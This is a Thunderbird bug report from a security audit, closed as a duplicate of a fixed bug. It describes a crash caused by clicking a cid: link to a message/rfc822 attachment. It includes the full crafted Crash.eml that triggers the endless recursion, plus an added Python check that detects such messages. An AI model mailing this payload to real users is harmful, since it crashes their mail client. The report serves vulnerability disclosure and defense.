Closed Bug 1411735 Opened 7 years ago Closed 7 years ago

TBE-01-006: Crash triggered by clicking link to .eml Attachment

Categories

(MailNews Core :: Attachments, defect)

Type: defect
Priority: Not set
Severity: critical

Tracking

(Not tracked)

RESOLVED DUPLICATE of bug 1343536

People

(Reporter: BenB, Unassigned)

References

Details

(Keywords: crash, csectype-dos, sec-low)

Thunderbird allows email bodies to load or link to attachments defined as other parts of the email. It was discovered that a link to a message/rfc822 attachment crashes Thunderbird as soon as a user clicks on it. After analyzing the crash, it transpired that Thunderbird was stuck in a loop which triggered a stack exhaustion exception.

File: Crash.eml
Content:

Content-Type: multipart/alternative; boundary="------------ 2DEE3F98D70BD2C65FBA7373"
MIME-Version: 1.0
Subject: Link
From: payload.payload@gmx.de
To: payload.payload@gmx.de
Date: Tue, 20 Sep 2017 14:54:55 +0200

--------------2DEE3F98D70BD2C65FBA7373
Content-Type: multipart/related; boundary="------------A320A96F6639F3C578F35383"

--------------A320A96F6639F3C578F35383
Content-Type: text/html
Content-Transfer-Encoding: 7Bit

<a href="cid:test">click to crash thunderbrid</a>
--------------A320A96F6639F3C578F35383
Content-ID: test
Content-Type: message/rfc822; name="attach.eml"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="attach.eml"

aaaaaaaaa
--------------A320A96F6639F3C578F35383--
--------------2DEE3F98D70BD2C65FBA7373--

It is recommended to evaluate the responsible code path and determine where the recursion takes place.

For the original report as PDF, see bug 1411701.
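A mail-gateway style check for the message structure described in this report, as an added example that is not part of the original bug or of Thunderbird's code: it flags messages in which an HTML part references, via cid:, a part whose type is message/rfc822. The function name and the sample message are constructed for illustration.

```python
import re
from email import message_from_string

# Constructed sample with the same shape as the report's Crash.eml: an HTML part
# and a message/rfc822 part carrying a Content-ID, plus a benign inline image.
SAMPLE = """\
MIME-Version: 1.0
Subject: Link
Content-Type: multipart/related; boundary="b1"

--b1
Content-Type: text/html
Content-Transfer-Encoding: 7bit

<a href="cid:test">open</a> <img src="cid:logo">
--b1
Content-ID: test
Content-Type: message/rfc822; name="attach.eml"
Content-Disposition: attachment; filename="attach.eml"

Subject: inner

aaaaaaaaa
--b1
Content-ID: <logo>
Content-Type: image/png
Content-Transfer-Encoding: base64

iVBORw0KGgo=
--b1--
"""

# Matches href/src attributes that point at a cid: URL and captures the id.
CID_REF = re.compile(r"""(?:href|src)\s*=\s*["']?cid:([^"'\s>]+)""", re.I)

def rfc822_cid_links(raw):
    """Return sorted Content-IDs referenced from HTML via cid: that name a message/rfc822 part."""
    msg = message_from_string(raw)
    referenced, rfc822_ids = set(), set()
    for part in msg.walk():
        cid = (part.get("Content-ID") or "").strip().strip("<>")
        ctype = part.get_content_type()
        if ctype == "message/rfc822" and cid:
            rfc822_ids.add(cid)
        elif ctype == "text/html":
            payload = part.get_payload(decode=True) or b""
            html = payload.decode(part.get_content_charset() or "utf-8", "replace")
            referenced.update(CID_REF.findall(html))
    return sorted(referenced & rfc822_ids)
```

A non-empty result means the message links to an embedded message part by Content-ID; ordinary inline images referenced by cid: are not reported.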
Severity: normal → critical
Looks like we already have this on file: Bug 1343536.
See Also: → 1343536
We might want to just dupe it, but "depends on" is fine for now if we don't want to publicize an easier way to mass-mail a DOS attack to all users.
Depends on: 1343536
Summary: Crash triggered by Link to .eml Attachment → TBE-01-006: Crash triggered by clicking link to .eml Attachment
On the dup bug, Jörg says that's an endless loop. So, a DoS.
We have a fix in bug 1343536 now.
Status: NEW → RESOLVED
Closed: 7 years ago
No longer depends on: 1343536
Resolution: --- → DUPLICATE
Group: mail-core-security